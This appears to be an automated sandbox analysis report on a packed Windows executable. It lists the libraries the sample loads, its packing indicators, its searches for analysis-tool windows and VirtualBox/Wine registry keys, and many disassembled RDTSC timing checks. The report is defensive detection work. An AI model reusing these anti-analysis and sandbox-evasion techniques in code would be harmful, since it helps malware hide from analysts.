Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: file.exe | Static file information: File size 3029504 > 1048576
Source: file.exe | Static PE information: Raw size of fvanlhxn is bigger than: 0x100000 < 0x2b8400

              Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.490000.0.unpack :EW;.rsrc :W;.idata :W;fvanlhxn:EW;vsjzakbl:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;fvanlhxn:EW;vsjzakbl:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x2eed66 should be: 0x2eed27
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: fvanlhxn
Source: file.exe | Static PE information: section name: vsjzakbl
Source: file.exe | Static PE information: section name: .taggant
Source: file.exe | Static PE information: section name: entropy: 7.978933020723451

              Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EF639 second address: 4EF643 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC714E8FEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EF643 second address: 4EEE8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FC714E98426h 0x00000009 jmp 00007FC714E9842Dh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 je 00007FC714E9842Dh 0x0000001a pushad 0x0000001b sbb di, B567h 0x00000020 popad 0x00000021 push dword ptr [ebp+122D0CA9h] 0x00000027 mov dword ptr [ebp+122D1CAEh], edi 0x0000002d call dword ptr [ebp+122D1D52h] 0x00000033 pushad 0x00000034 jmp 00007FC714E98430h 0x00000039 xor eax, eax 0x0000003b xor dword ptr [ebp+122D1CB3h], ebx 0x00000041 ja 00007FC714E9842Ch 0x00000047 mov edx, dword ptr [esp+28h] 0x0000004b jmp 00007FC714E9842Eh 0x00000050 mov dword ptr [ebp+122D2BCBh], eax 0x00000056 mov dword ptr [ebp+122D265Bh], eax 0x0000005c mov esi, 0000003Ch 0x00000061 mov dword ptr [ebp+122D265Bh], edx 0x00000067 add esi, dword ptr [esp+24h] 0x0000006b jbe 00007FC714E9842Ch 0x00000071 mov dword ptr [ebp+122D1F71h], edx 0x00000077 lodsw 0x00000079 mov dword ptr [ebp+122D1CB3h], ecx 0x0000007f add eax, dword ptr [esp+24h] 0x00000083 mov dword ptr [ebp+122D247Eh], eax 0x00000089 mov ebx, dword ptr [esp+24h] 0x0000008d jmp 00007FC714E9842Fh 0x00000092 nop 0x00000093 push eax 0x00000094 push edx 0x00000095 push ebx 0x00000096 push edi 0x00000097 pop edi 0x00000098 pop ebx 0x00000099 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 66C62C second address: 66C65E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEEFh 0x00000007 jmp 00007FC714E8FEEDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC714E8FEF0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6784D7 second address: 6784DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6784DB second address: 6784E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6784E4 second address: 6784EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6784EC second address: 6784F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FC714E8FEEEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6784F9 second address: 678525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jnp 00007FC714E98432h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FC714E9842Ah 0x00000015 jmp 00007FC714E9842Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 678525 second address: 678529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 678529 second address: 67852D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 67868A second address: 67869A instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC714E8FEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6787BB second address: 6787DB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC714E98432h 0x00000008 jl 00007FC714E98426h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6787DB second address: 6787E1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6787E1 second address: 678821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC714E98438h 0x0000000f js 00007FC714E9843Eh 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FC714E98436h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 678821 second address: 67882D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC714E8FEE6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 678996 second address: 6789A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6789A0 second address: 6789C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC714E8FEF2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6789C7 second address: 6789CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 67A5CC second address: 67A5FB instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC714E8FEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push ecx 0x0000000f jmp 00007FC714E8FEEFh 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC714E8FEEEh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 67A5FB second address: 67A618 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC714E98426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC714E9842Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 67A618 second address: 67A6C6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC714E8FEECh 0x00000008 jc 00007FC714E8FEE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FC714E8FEE8h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b sub dword ptr [ebp+122D1D6Ch], edx 0x00000031 push 00000003h 0x00000033 pushad 0x00000034 call 00007FC714E8FEEFh 0x00000039 push esi 0x0000003a pop ebx 0x0000003b pop esi 0x0000003c je 00007FC714E8FEECh 0x00000042 ja 00007FC714E8FEE6h 0x00000048 popad 0x00000049 mov dword ptr [ebp+122D25ACh], edx 0x0000004f push 00000000h 0x00000051 mov dx, 0BF6h 0x00000055 push 00000003h 0x00000057 mov esi, dword ptr [ebp+122D2D17h] 0x0000005d call 00007FC714E8FEE9h 0x00000062 jno 00007FC714E8FEF2h 0x00000068 push eax 0x00000069 jnp 00007FC714E8FF06h 0x0000006f pushad 0x00000070 jmp 00007FC714E8FEF8h 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 67A6C6 second address: 67A6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a jmp 00007FC714E98438h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 67A6EB second address: 67A6FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 67A6FB second address: 67A6FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 67A6FF second address: 67A709 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC714E8FEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 67A709 second address: 67A771 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC714E98434h 0x00000008 jmp 00007FC714E9842Dh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jmp 00007FC714E98437h 0x00000019 pop eax 0x0000001a push edx 0x0000001b xor dl, FFFFFFD6h 0x0000001e pop esi 0x0000001f lea ebx, dword ptr [ebp+1245F43Ah] 0x00000025 ja 00007FC714E98426h 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push edi 0x00000030 pop edi 0x00000031 jmp 00007FC714E9842Dh 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 67A85A second address: 67A85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 67A85E second address: 67A862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 67A9B4 second address: 67AA32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a add dword ptr [esp], 42D468FDh 0x00000011 mov esi, eax 0x00000013 mov dx, di 0x00000016 push 00000003h 0x00000018 mov dword ptr [ebp+122D22DCh], eax 0x0000001e push 00000000h 0x00000020 call 00007FC714E8FEF4h 0x00000025 jl 00007FC714E8FEECh 0x0000002b mov dword ptr [ebp+122D1D15h], edi 0x00000031 pop ecx 0x00000032 push 00000003h 0x00000034 jnc 00007FC714E8FEECh 0x0000003a sub dword ptr [ebp+122D1D15h], esi 0x00000040 mov esi, 3C1CDAF5h 0x00000045 push CEC41694h 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FC714E8FEF9h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 67AA32 second address: 67AA42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E9842Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 67AA42 second address: 67AA7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 0EC41694h 0x00000010 and dx, 6D9Dh 0x00000015 lea ebx, dword ptr [ebp+1245F44Eh] 0x0000001b or dword ptr [ebp+122D2683h], ecx 0x00000021 mov dword ptr [ebp+122D269Ah], edi 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 67AA7B second address: 67AA7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 67AA7F second address: 67AA9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 67AA9A second address: 67AAA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 67AAA0 second address: 67AAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69BFDD second address: 69C004 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC714E98428h 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007FC714E98439h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69C004 second address: 69C008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 663EB0 second address: 663EBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 663EBC second address: 663EC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 663EC2 second address: 663ECD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007FC714E98426h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69A108 second address: 69A10E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69A10E second address: 69A113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69A113 second address: 69A118 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69A3E8 second address: 69A3F2 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC714E9842Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69A3F2 second address: 69A3FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69A3FA second address: 69A3FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69A533 second address: 69A53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69A53E second address: 69A544 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69A9C7 second address: 69A9D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC714E8FEE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69A9D3 second address: 69A9D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69AB23 second address: 69AB29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69AB29 second address: 69AB3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push esi 0x00000008 jmp 00007FC714E9842Bh 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69AB3F second address: 69AB51 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC714E8FEE8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FC714E8FEE6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69AF8B second address: 69AF95 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC714E9842Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69AF95 second address: 69AFD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007FC714E8FEF2h 0x0000000c jnl 00007FC714E8FEE6h 0x00000012 je 00007FC714E8FEE6h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007FC714E8FEEFh 0x00000022 jp 00007FC714E8FEE6h 0x00000028 popad 0x00000029 jl 00007FC714E8FEF2h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69AFD0 second address: 69AFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69AFD6 second address: 69AFDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69AFDA second address: 69AFDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69AFDF second address: 69AFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69B84F second address: 69B855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69B855 second address: 69B8A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC714E8FEF8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a jo 00007FC714E8FEE6h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007FC714E8FEF3h 0x00000019 push edi 0x0000001a jnc 00007FC714E8FEE6h 0x00000020 pop edi 0x00000021 push edi 0x00000022 pushad 0x00000023 popad 0x00000024 pushad 0x00000025 popad 0x00000026 pop edi 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69BB56 second address: 69BB66 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FC714E9842Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69BE14 second address: 69BE19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69BE19 second address: 69BE21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 69FCA2 second address: 69FCA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A13C9 second address: 6A13CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A13CD second address: 6A1404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC714E8FEF5h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FC714E8FEF6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A1404 second address: 6A1418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a js 00007FC714E98434h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A26D4 second address: 6A2717 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEF6h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC714E8FEF4h 0x0000000e jmp 00007FC714E8FEF5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A2717 second address: 6A271B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65EC78 second address: 65EC7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A6236 second address: 6A623C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
